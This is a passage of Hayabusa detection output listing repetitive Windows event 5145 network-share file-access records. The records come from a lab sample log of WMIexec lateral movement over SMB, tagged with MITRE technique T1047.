: File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 